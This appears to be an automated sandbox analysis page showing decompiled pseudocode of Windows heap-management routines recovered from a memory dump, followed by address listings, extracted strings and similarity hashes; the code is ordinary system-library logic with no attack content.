						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E1E3AB150();
						} else {
							E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E1E3AB150();
						__eflags =  *0x1e497bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E1E462073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x1e498a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x1e49b1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E1E3E9730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E1E46A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E1E3E9660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E1E46138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E1E45FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E1E46A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E1E46A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E1E3C7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E1E461582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E1E3C7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E1E461582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E1E3CB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E1E3CBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E1E46A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}

0x1e3cb486
0x1e3cb48a
0x1e3cb48e
0x1e3cb491
0x1e3cb493
0x1e3cb49a
0x1e3cb49c
0x1e3cb4a2
0x1e3cb4a7
0x1e3cb6fc
0x1e3cb6fc
0x1e3cb6b3
0x1e3cb6c3
0x1e3cb6c3
0x1e3cb4b4
0x1e41294f
0x1e412951
0x1e412957
0x1e41295d
0x1e412961
0x1e412980
0x1e412985
0x1e412963
0x1e412978
0x1e41297d
0x1e41298b
0x1e412990
0x1e412995
0x1e41299d
0x1e4129a1
0x1e4129a2
0x1e4129a2
0x1e4129a7
0x1e4129a7
0x1e412951
0x1e3cb4ba
0x1e3cb4ba
0x1e3cb4bd
0x1e3cb4c2
0x1e3cb6d4
0x1e3cb4c8
0x1e3cb4c8
0x1e3cb4c8
0x1e3cb4cd
0x1e3cb4d0
0x1e3cb4d9
0x1e3cb4df
0x1e3cb4e2
0x1e4129b7
0x1e4129bd
0x00000000
0x1e3cb4e8
0x1e3cb4e8
0x1e3cb4ef
0x1e3cb4fa
0x1e3cb703
0x1e3cb709
0x1e3cb70b
0x1e3cb711
0x1e3cb711
0x1e3cb70b
0x1e3cb503
0x1e3cb50c
0x1e3cb511
0x1e3cb514
0x1e3cb519
0x1e4129c5
0x1e4129c7
0x1e4129cc
0x1e4129cd
0x1e4129cf
0x1e4129d0
0x1e4129d2
0x1e4129d7
0x1e4129d9
0x1e4129ee
0x1e4129ee
0x1e4129f4
0x1e4129fa
0x1e412a01
0x00000000
0x1e412a01
0x1e4129db
0x1e4129df
0x00000000
0x00000000
0x1e4129e1
0x1e4129e4
0x00000000
0x00000000
0x1e4129e6
0x1e4129e6
0x1e3cb51f
0x1e3cb51f
0x1e3cb520
0x1e3cb525
0x1e3cb52b
0x1e3cb52d
0x1e3cb52e
0x1e3cb530
0x1e3cb535
0x1e3cb53b
0x1e3cb53d
0x1e412a07
0x00000000
0x1e412a07
0x1e3cb549
0x1e3cb54e
0x1e412a12
0x1e412a15
0x00000000
0x00000000
0x1e412a24
0x1e3cb559
0x1e3cb55c
0x1e412a34
0x1e412a3b
0x1e412a4d
0x1e412a4d
0x1e412a3b
0x1e3cb566
0x1e3cb56b
0x1e3cb56f
0x1e3cb57b
0x1e3cb582
0x1e412a57
0x1e412a5c
0x1e412a5c
0x1e3cb582
0x1e3cb58b
0x1e3cb58e
0x1e3cb592
0x1e3cb596
0x1e3cb599
0x1e3cb59b
0x1e3cb59e
0x1e3cb5a3
0x1e3cb5a6
0x1e3cb5a9
0x1e412a66
0x1e412a67
0x1e412a73
0x1e412a78
0x1e3cb5b8
0x1e3cb5b8
0x1e3cb5bb
0x1e3cb5bd
0x1e3cb5bd
0x1e3cb5c4
0x1e3cb5f7
0x1e3cb5f7
0x1e3cb600
0x1e3cb606
0x1e3cb60c
0x1e3cb612
0x1e3cb618
0x1e3cb621
0x1e3cb623
0x1e3cb629
0x1e3cb629
0x1e3cb62c
0x1e3cb62f
0x1e3cb633
0x1e3cb636
0x1e3cb639
0x1e3cb71d
0x1e3cb720
0x1e3cb736
0x1e3cb660
0x1e3cb660
0x1e3cb662
0x1e3cb665
0x1e3cb66a
0x1e3cb6e6
0x1e3cb6e7
0x1e3cb6ea
0x1e3cb6ef
0x1e412ad1
0x1e412ad2
0x1e412ad8
0x1e412add
0x1e412add
0x1e3cb6f5
0x1e3cb6f5
0x1e3cb672
0x1e3cb675
0x1e3cb67a
0x1e412ae5
0x1e412ae8
0x00000000
0x00000000
0x1e412af4
0x1e412afc
0x00000000
0x1e3cb680
0x1e3cb680
0x1e3cb680
0x1e3cb685
0x1e3cb687
0x1e3cb68a
0x1e412b06
0x1e412b0c
0x1e412b13
0x1e412b1e
0x1e412b20
0x1e412b2b
0x1e412b2b
0x1e412b2b
0x1e412b34
0x1e412b45
0x1e412b45
0x1e412b13
0x1e3cb696
0x1e3cb69b
0x1e3cb6a0
0x1e412b4f
0x1e412b52
0x00000000
0x00000000
0x1e412b61
0x00000000
0x1e3cb6a6
0x1e3cb6a6
0x1e3cb6a6
0x1e3cb6a8
0x1e3cb6ab
0x1e412b70
0x1e412b72
0x1e412b7d
0x1e412b7d
0x1e412b7d
0x1e412b86
0x1e412b97
0x1e412b97
0x1e3cb6b1
0x00000000
0x1e3cb6b1
0x1e3cb6a0
0x1e3cb67a
0x1e3cb722
0x1e3cb722
0x1e3cb655
0x1e3cb65d
0x00000000
0x1e3cb5c6
0x1e3cb5c6
0x1e3cb5ce
0x1e412a83
0x1e412a97
0x1e412a97
0x1e412a9a
0x00000000
0x00000000
0x1e412a88
0x1e412a8a
0x1e412a8c
0x1e412a8f
0x1e412a92
0x1e412aa1
0x1e412aa1
0x1e412aa2
0x1e412aab
0x1e412ab0
0x00000000
0x1e412ab0
0x1e412a94
0x1e412a94
0x00000000
0x1e412a9c
0x1e3cb5d4
0x1e3cb5d4
0x1e3cb5d6
0x1e3cb5d9
0x1e3cb5de
0x1e3cb5e1
0x1e3cb5e4
0x1e412ab8
0x1e412ab9
0x1e412ac4
0x1e412ac9
0x1e3cb5f2
0x1e3cb5f2
0x1e3cb5f4
0x1e3cb5f4
0x00000000
0x1e3cb5e4
0x1e3cb5c4
0x1e3cb554
0x1e3cb554
0x00000000
0x1e3cb554

Strings

HEAP[%wZ]: , xrefs: 1E412973
(UCRBlock->Size >= *Size), xrefs: 1E41298B
HEAP: , xrefs: 1E412980

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 800a5051d0f8c3b936d62be19f8219221cfe01c5219ec8199f24d7e137e73321
Instruction ID: b64e29bd8a04681e332e90a66a09afef449a9cec3b7140213e54d88227b3bf79
Opcode Fuzzy Hash: 800a5051d0f8c3b936d62be19f8219221cfe01c5219ec8199f24d7e137e73321
Instruction Fuzzy Hash: 08E19C70B106459FDB09CF69C894BAAB7BAFF48704F104AAAE406DB391D734ED41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1E47E824, Relevance: 6.5, APIs: 4, Instructions: 493
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E1E47E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x1e49d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L1E3CFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E1E3CFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x1e49b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E1E3C2280(E1E3EF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E1E3BFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x1e49b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E1E3EB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E1E3DF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x1e49b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x1e49b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E1E47E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E1E47E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E1E47E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E1E3CFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E1E47E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x1e47e833
0x1e47e839
0x1e47e83e
0x1e47e841
0x1e47e848
0x1e47e84b
0x1e47e851
0x1e47e8b2
0x1e47e8b2
0x1e47e8b5
0x1e47e90b
0x1e47e911
0x1e47e913
0x1e47e913
0x1e47e91a
0x1e47e91d
0x1e47e922
0x1e47e924
0x1e47e924
0x1e47e924
0x1e47e92f
0x1e47e933
0x1e47e935
0x1e47e93a
0x1e47e940
0x1e47e948
0x1e47e950
0x1e47e955
0x00000000
0x00000000
0x1e47e957
0x1e47e95c
0x1e47e9cb
0x1e47e9d2
0x1e47e9d4
0x1e47e9f2
0x1e47e9f6
0x1e47ea10
0x1e47ea18
0x1e47ea1a
0x1e47ea1f
0x1e47ea2c
0x1e47ea2d
0x1e47ea2e
0x1e47ea32
0x1e47ea3d
0x1e47ea42
0x1e47ea45
0x1e47ea51
0x1e47ea60
0x1e47ea65
0x1e47ea68
0x1e47ea6a
0x1e47ea6a
0x1e47ea6a
0x1e47ea6f
0x1e47ea76
0x1e47ea7c
0x1e47ea7e
0x1e47ea81
0x1e47ea85
0x1e47ea88
0x1e47ea8c
0x1e47ea8f
0x1e47ea93
0x1e47ea98
0x00000000
0x00000000
0x1e47ea9a
0x1e47ea9d
0x1e47eaa2
0x1e47eb0e
0x1e47eb15
0x1e47eb17
0x1e47eb33
0x1e47eb36
0x1e47eb39
0x1e47eb3f
0x1e47eb45
0x1e47eb4a
0x1e47eb52
0x1e47ecb1
0x1e47ecb9
0x1e47ecbe
0x1e47ecc3
0x1e47ecc6
0x1e47eceb
0x1e47ecee
0x1e47ecf9
0x1e47ecfe
0x1e47ed00
0x1e47ed05
0x1e47ed07
0x1e47ed0a
0x1e47ed0c
0x1e47ed0e
0x1e47ed12
0x1e47ed19
0x1e47ed1e
0x1e47ed24
0x1e47ed2a
0x1e47ed2a
0x1e47ed2c
0x1e47ed3e
0x1e47ed3e
0x1e47eb5a
0x1e47eb62
0x1e47eb69
0x00000000
0x00000000
0x1e47eb6f
0x1e47eb75
0x1e47eb79
0x1e47eb79
0x1e47eb88
0x1e47eb8e
0x1e47eb90
0x1e47eb92
0x1e47eb97
0x1e47ed3f
0x1e47ed45
0x00000000
0x00000000
0x1e47ed4b
0x1e47ed4e
0x00000000
0x1e47eb9d
0x1e47eb9d
0x1e47eb9d
0x1e47eba2
0x1e47ebb5
0x1e47ebbc
0x1e47ebbe
0x1e47ebbe
0x1e47ebc3
0x1e47ebc5
0x1e47ebcb
0x1e47ebd2
0x1e47ebd5
0x1e47ebdb
0x1e47ebdf
0x1e47ebe1
0x1e47ebf0
0x1e47ebf9
0x1e47ec04
0x1e47ec07
0x1e47ec0a
0x1e47ec82
0x1e47ec85
0x1e47ec8b
0x1e47ec91
0x1e47ec93
0x1e47ec96
0x1e47ec9b
0x1e47eca6
0x1e47ecac
0x1e47ecae
0x1e47ecae
0x00000000
0x00000000
0x00000000
0x00000000
0x1e47ec0c
0x1e47ec0c
0x1e47ec0c
